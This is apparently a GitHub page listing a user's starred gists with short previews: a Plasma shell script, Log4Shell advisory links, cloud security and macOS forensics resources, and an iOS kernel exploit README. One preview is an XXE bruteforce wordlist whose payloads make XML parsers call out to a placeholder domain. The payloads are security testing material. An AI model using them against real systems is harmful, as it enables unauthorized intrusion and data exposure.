Skip to content

Instantly share code, notes, and snippets.

View KevCui's full-sized avatar
🖤

K̶e̶v̶i̶n̶ KevCui

🖤
123 followers · 54 following
View GitHub Profile
@davidedmundson
davidedmundson / PlasmaNested.sh
Last active July 15, 2024 02:34
Run plasma from within gamescope
#!/bin/sh
# Remove the performance overlay, it meddles with some tasks
unset LD_PRELOAD
## Shadow kwin_wayland_wrapper so that we can pass args to kwin wrapper
## whilst being launched by plasma-session
mkdir $XDG_RUNTIME_DIR/nested_plasma -p
cat <<EOF > $XDG_RUNTIME_DIR/nested_plasma/kwin_wayland_wrapper
#!/bin/sh
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active June 28, 2024 12:07
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@ramimac
ramimac / Cloud Security Orienteering Checklist.md
Last active April 24, 2024 03:54
A Checklist of Cloud Security Orienteering

Cloud Security Orienteering: Checklist
by Rami McCarthy
via TL;DR sec

How to orienteer in a cloud environment, dig in to identify the risks that matter, and put together actionable plans that address short, medium, and long term goals.

Based on the Cloud Security Orienteering methodology.

Checklist

@0xmachos
0xmachos / macOS-IR-Forensics.md
Last active July 11, 2024 14:58
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
@stephenbradshaw
stephenbradshaw / python3_https_server.py
Created November 5, 2020 01:26
Python 3 Simple HTTPS server
#!/usr/bin/env python3
# python3 update of https://gist.github.com/dergachev/7028596
# Create a basic certificate using openssl:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# Or to set CN, SAN and/or create a cert signed by your own root CA: https://thegreycorner.com/pentesting_stuff/writeups/selfsignedcert.html
import http.server
import ssl
httpd = http.server.HTTPServer(('127.0.0.1', 443), http.server.SimpleHTTPRequestHandler)
@honoki
honoki / xxe-payloads.txt
Last active March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
@IanColdwater
IanColdwater / twittermute.txt
Last active July 2, 2024 02:25
Here are some terms to mute on Twitter to clean your timeline up a bit.
Mute these words in your settings here: https://twitter.com/settings/muted_keywords
ActivityTweet
generic_activity_highlights
generic_activity_momentsbreaking
RankedOrganicTweet
suggest_activity
suggest_activity_feed
suggest_activity_highlights
suggest_activity_tweet
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active June 17, 2024 04:09
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@ur0
ur0 / README.md
Last active June 13, 2024 00:24
SockPuppet 3

SockPuppet 3

This is a kernel exploit targeting iOS 12.0-12.2 and 12.4. It exploits a dangling kernel pointer to craft a fake task port corresponding to the kernel task and gets a send right to it.

This code is not readily compilable — some common sense is a prerequisite. If you do get it going though, it is extremely reliable on any device with more than a gigabyte of RAM. Interested readers may want to investigate how reallocations can be prevented -- this might improve reliability even more.

License

@vcastroi
vcastroi / css-layout-hack.js
Last active March 17, 2024 18:22
// create a bookmark and use this code as the URL, you can now toggle the css on/off
// thanks+credit: https://dev.to/gajus/my-favorite-css-hack-32g3
javascript: (function() {
var elements = document.body.getElementsByTagName('*');
var items = [];
for (var i = 0; i < elements.length; i++) {
if (elements[i].innerHTML.indexOf('* { background:#000!important;color:#0f0!important;outline:solid #f00 1px!important; background-color: rgba(255,0,0,.2) !important; }') != -1) {
items.push(elements[i]);
}
}